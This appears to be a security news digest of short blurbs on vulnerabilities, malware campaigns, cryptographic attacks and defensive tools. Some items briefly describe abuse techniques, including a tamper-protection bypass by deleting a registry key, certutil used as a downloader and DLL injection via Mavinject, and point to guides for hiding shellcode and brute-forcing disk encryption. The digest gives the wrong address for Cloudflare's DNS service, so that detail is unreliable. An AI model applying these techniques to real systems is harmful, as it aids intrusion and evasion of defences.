The U.S. Secret Service is warning about a new scam scheme where the crooks are intercepting new debit cards in the mail and replace the chips on the cards with chips from old cards. Once owners activate the cards, crooks will use stolen chips for their financial gain.
Russian state regulator Roskomnadzor have ordered to block the Telegram messaging application 48 hours after it missed a deadline to give up encryption keys to the online conversations of its users. I am not sure whether the Telegram protocol is actually blocked in Russia now.
A new Android P version will enforce applications to communicate over TLS secured connection by default.
Kudelski Security published a walk-through guide about Manger's attack against RSA OAEP. 1-bit leak from oraculum suffices to decrypt ciphertexts.
In depth article about stealing FUZE credit card content via Bluetooth.
Understanding Code Signing Abuse in Malware Campaigns. Pretty good statistics.
There is a vulnerability that results in a bypass of a tamper protection provided by the Sophos Endpoint Protection v10.7. Protection mechanism can be bypassed by deleting the unprotected registry key.
Several vulnerabilities have been found in the Apache HTTPD server. Update now.
Microsoft Windows tool certutil.exe for displaying certification authority information can be used to fetch data from the internet in the similar fashion like WGET or CURL.
There is a paper about breaking 256-bit security (NIST post-quantum candidate) WalnutDSA in under a minute.
Snallygaster - a Tool to Scan for Secrets on Web Servers
Nice map of the ongoing Linux kernel defenses. The map shows the relations between the vulnerability classes, current kernel defenses and bug detection mechanisms.
There is a critical flaw in Microsoft Malware Protection Engine (CVE-2018-0986). They have used the open source unrar code, changed all the signed ints, breaking the code. Remote SYSTEM memory corruption.
Blog by Latacora about the right choices and parameters when dealing with cryptography for backups, communication, authentication, etc. Nice summary, with the explanation and historical references.
An Italian football club Lazio has been scammed by a social engineering attack via email. The club sent out transfer bill of €2 million to a fraudster’s bank account instead of the Feyenoord Dutch club.
The people behind the Google Wycheproof project, which is testing crypto libraries against known attacks released test vectors for many crypto primitives.
Cloudflare announced consumer DNS service sitting on a 184.108.40.206 address. Supports DNS-over-TLS, also DNS-over-HTTPS.
Good explanatory blog about the oblivious DNS and why DNS should not require our trust at all.
There is a local privilege escalation vulnerability (CVE-2018-0492) in the Debian beep package. Yes, beep package for motherboard beeping. Escalation, because setuid + race condition.
LibreSSL 2.7.0 was accepting all invalid host names as correct. A vulnerability was found by Python maintainer Christian Heimes when running tests after porting new LibreSSL to the Python 3.7. Nobody affected.
VirusTotal launches a new Android Sandbox system VirusTotal Droidy to help security researchers detect malicious apps based on behavioral analysis.
MesaLink is a new memory-safe and OpenSSL-compatible TLS library written in Rust.
The Fidelis Cybersecurity researcher Jason Reaves demonstrated how covertly exchange data using X.509 digital certificates. The proof of concept code is using SubjectKeyIdentifier and generating certificates on the fly.
The "UDPoS" Point of Sale malware is using DNS traffic to exfiltrate stolen credit card data.
Talos analyzed malware threat targeting Olympic computer systems during the opening ceremony. The main purpose was information gathering and destroying the system.
Zero-day vulnerability in the Bitmessage messaging client was exploited to steal Electrum cryptocurrency wallet keys.
Trustwave analyzed multi-stage Microsoft Word attack which is NOT using macros. Really creative technique.
Microsoft can't fix Skype privilege escalation bug without the massive code rewrite, so they postponed it for a while.
Facebook is advertising their Onavo VPN application, but there are a few reasons why it is really not a good idea to use it.
Facebook is spamming users via SMS registered for two factor authentication (2FA). Then posts their responses on a wall.
(Not only) Performance analysis of a Retpoline mitigation for Spectre vulnerability.
A guide on how to brutefoce Linux Full Disk Encryption (LUKS) volumes using Hashcat software.
Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability. It is possible to silently send any files. All operating systems affected before 5.4.5/6.0.1 versions.
A.P. Moller–Maersk Group, the world's largest container shipping company, reinstalled 45000 PCs and 4000 Servers to recover from the NotPetya ransomware attack.
The U.S. Secret Service is warning financial institutions that ATM jackpotting attacks are targeting cash machines in the United States. Attackers are able to empty Diebold Nixdorf and possibly other ATM machines with malware, endoscope and social engineering skills.
Microsoft disables Spectre software mitigation released earlier this month due to system instability.
Data from the fitness tracking app Strava gives away the location of sensitive locations like army bases.
China built African union building for free, but the building is riddled with microphones and computers are transmitting all voice data back to servers in Shanghai.
Journalist Marc Miller has interviewed one of the hackers of the ICEMAN group behind "Emmental" phishing campaign targeting bank clients.
Errata Security blog about the political nature of the cyber attack attribution. Mostly about the WannaCry and North Korea connection, but it is a good overview on attribution bias in general.
Great article about the largest malvertising campaign of a last year. So called Zirconium group operated up to 30 different ad agencies which enabled them to redirect users to the exploit kits, malware downloads and click fraud websites.
AutoSploit is an automated exploitation tool written in python. It is able to search for targets using Shodan.io API and exploiting them with Metasploit.
Crooks hacked Fox-IT by capturing fox-it.com DNS record, then obtained a certificated and executed a man-in-the-middle attack on connection.
The Mandiant - FireEye company analyzed an incident at a critical infrastructure organization where an attacker deployed so called TRITON malware designed to manipulate industrial safety system. According to the analysis, "the malware was delivered as a Py2EXE compiled python script [...] containing standard Python libraries, open source libraries, as well as the attacker-developed Triconex attack framework for interacting with the Triconex controllers."
The anonymous researcher behind the massive internet scans of the IoT devices known for the BrickerBot case published some insights on his operation. Looks like he is a gray hat after all.
Google published Android security roadmap for the next year. There will be lots of improvements, and new requirements for App developers.
Multiple vulnerabilities were identified in Telegram messenger for Android, like arbitrary file overwrite on receiving and directory traversal. There are definitely better alternatives to this software...
Guy uploaded his self-signed malformed certificate to the websites which process them and found out lots of them is vulnerable to the XSS injection.
Mavinject is a legitimate Windows component digitally signed by Microsoft, that can be abused to inject any DLL inside a running process.
Microsoft pushed comprehensive audit reports on Windows Events to GitHub.
The "Janus" Android vulnerability (CVE-2017-13156) allows attackers to modify the code in applications without affecting their signatures. The root of the problem is that a file can be a valid APK file and a valid DEX file at the same time. The vulnerability allows attackers to inject malware into legitimate application and avoiding detection.
According to the research by Hanno Böck, Juraj Somorovsky and Craig Young, the Bleichenbacher’s attack on RSA PKCS#1v1.5 encryption still works on almost 3% of the Alexa top million most visited websites. The researchers were even able to sign a message using Facebook’s private TLS key. Vendors like Citrix, F5, Cisco, and multiple SSL implementations are affected.
HP had a keylogger in the Touchpad driver, which was disabled by default, but could be enabled by setting a registry value.
There is a remote root code execution flaw (CVE-2017-15944) in the Palo Alto Networks firewalls.
Researchers from the Group-IB spotted the operations of a Russian-speaking MoneyTaker group that stole as much as $10 million from US and Russian banks.
Recorded Future analyzed costs of various cybercriminal services sold on the dark market.
Internet traffic for organizations such as Google, Apple, Facebook, Microsoft, Twitch were briefly rerouted to Russia.
Microsoft started rolling out an update for Malware Protection Engine to fix a remotely exploitable bug discovered by the British intelligence agency.
Avast open-sources RetDec machine-code decompiler for platform-independent analysis of executable files. It's based on LLVM.
Wireless network sniffer Kismet now supports the DJI DroneID UAV telemetry extensions.
Wazuh - Wazuh helps you to gain deeper security visibility into your infrastructure by monitoring hosts at an operating system and application level.
It supports log management and analysis, integrity monitoring, anomaly detection and compliance monitoring.
Wifiphisher is an automated victim-customized phishing attacks against Wi-Fi clients.
Multiple critical vulnerabilities were found in the Intel Management Engine, Trusted Execution Engine and Server Platform Services by Intel audit after 3rd party researchers reported the privilege escalation vulnerability.
If you have a vulnerable F5, basically attackers can sign anything with your RSA private key. An F5 BIG-IP virtual server configured with a Client SSL profile may be vulnerable to an Adaptive Chosen Ciphertext attack (AKA Bleichenbacher attack) against RSA, which when exploited, may result in plaintext recovery of encrypted messages.
MalwareHunterTeam discovered a new variant of the CryptoMix ransomware. It uses hardcoded RSA keys and can work offline.
Attackers are using Microsoft’s Office documents Dynamic Data Exchange protocol to download and install malware. Microsoft does not consider it a vulnerability.
Nice step by step guide on how to put shellcode into a legitimate PE file, and make it undetectable.
Extensive review of U2F hardware devices.
al-khaser is a PoC malware with good intentions that aims to stress your anti-malware system. It performs a bunch of nowadays malware tricks and the goal is to see if you stay under the radar.
Puffs is a domain-specific language and library for parsing untrusted file formats safely. Examples of such file formats include images, audio, video, fonts and compressed archives.
SensePost researchers found out that the Microsoft Office home page is able to compromise user by loading ActiveX component with VBscript.
Microsoft security department were contacted by a worried user that found 2 seemingly identical µTorrent executables, with valid digital signatures, but different cryptographic hashes. As they have found out there were marketing campaign identifier in "a text file inside a ZIP file inside a PE file, BASE64 encoded and injected in the digital signature of a PE file.". Quite complicated...
A vulnerability (CVE-2017-15361) in generation of RSA keys used by a software library adopted in cryptographic smartcards, security tokens and other secure hardware chips manufactured by Infineon Technologies AG allows for a practical factorization attack, in which the attacker computes the private part of an RSA key. The attack is feasible for commonly used key lengths, including 1024 and 2048 bits, and affects chips manufactured as early as 2012, that are now commonplace.
The rolling code in electronic keys for Subaru Forester (2009) and some other models are not random. Keys can be cloned, cars unlocked, with the hardware costs of $25. https://github.com/tomwimmenhove/subarufobrob
Microsoft reintroduced a Pool-based overflow kernel vulnerability on Windows 10 x64 (RS2) Creators Update which was originally patched in 2016. The guys wrote an exploit with rich explanation.
Blog about the "Exploding Git Repositories" that will crash your git process.
MediaTek and Broadcom Wi-Fi AP drivers have a weak random number generator, allowing prediction of Group Temporal Key. Practical attack requires a LOT of handshakes.
How to hide a process from SysInternals without the admin rights, but with the privilege escalation.
Adam Langley blogged about the low level testing of the FIDO U2F security keys, namely Yubico, VASCO SecureClick, Feitian ePass, Thetis, U2F Zero, KEY-ID / HyperFIDO.
Good introductory blog about the (in)security of Intel Boot Guard. The author also published source code of the UEFITool with visual validation of Intel Boot Guard coverage.
A script that tests if access points are affected by Key Reinstallation Attacks (CVE-2017-13082) was published on a GitHub by researcher Mathy Vanhoef.
The Miscreant is a Misuse-resistant symmetric encryption library supporting the AES-SIV (RFC 5297) and CHAIN/STREAM constructions.
There is a great probability that if you used Outlook’s S/MIME encryption in the past 6 months, plaintext of your emails was leaked to the mail exchange because of Outlook S/MIME CVE-2017-11776 vulnerability.
The Kaspersky anti-virus was allegedly stealing NSA secrets using a silent signature mode that detected classified documents. Israel hacked the Kaspersky, and notified the NSA.
A custom OxygenOS Android fork that comes installed on all OnePlus smartphones, is tracking users, allowing OnePlus to connect each phone to its customer.
Chromebooks and Chromeboxes are affected by a bug in certain Infineon Trusted Platform Module (TPM) firmware versions. RSA keys generated by the TPM being vulnerable to a computationally expensive attacks. Targeted attacks are possible.
KovCoreG hacking group used advertising network on Pornhub to redirect users to a fake browser update websites that installed malware.
Apple released a security patch for macOS High Sierra 10.13 to fix vulnerabilities in the Apple file system (APFS) volumes and Keychain software. The patch also addresses a flaw in the Apple file system that exposes encrypted drive’s password in the hint box.
Yet another part of the reverse engineering blog post series analyzing TrickBot with IDA.
Keybase has launched a nice new feature - encrypted Git. There are no services like website, pull requests, issue tracking or wiki, just simple git. Encrypted.
Security researcher Gal Beniamini from Google has discovered a security vulnerability (CVE-2017-11120) in Apple's iPhone and other devices that use Broadcom Wi-Fi chips and published working exploit after notifying affected parties.
Google engineers also found multiple flaws and vulnerabilities in the popular DNS software package - Dnsmasq. The patches are now committed to the project’s git repository. Make sure to upgrade to v2.78.
Arbor Networks researchers attributed Flusihoc DDoS botnet to the Chinese origins. More than 154 different command and control servers were used during the years, with over 48 still active right now.
HP Enterprise shared ArcSight source code with the Russians.
The vulnerability in Siemens industrial switches allows an unauthenticated attacker who has access to the network to remotely perform administrative actions.
Computer manufacturer company Purism is currently running crowdfunding campaign to finance Librem 5 – A Security and Privacy Focused Phone.
From the campaign webpage:
"Librem 5, the phone that focuses on security by design and privacy protection by default. Running Free/Libre and Open Source software and a GNU+Linux Operating System designed to create an open development utopia, rather than the walled gardens from all other phone providers."
Microsoft announced new cloud-based memory corruption bug detector with the codename Project Springfield.
Super-Stealthy Droppers - Linux "Diskless" binary execution by example.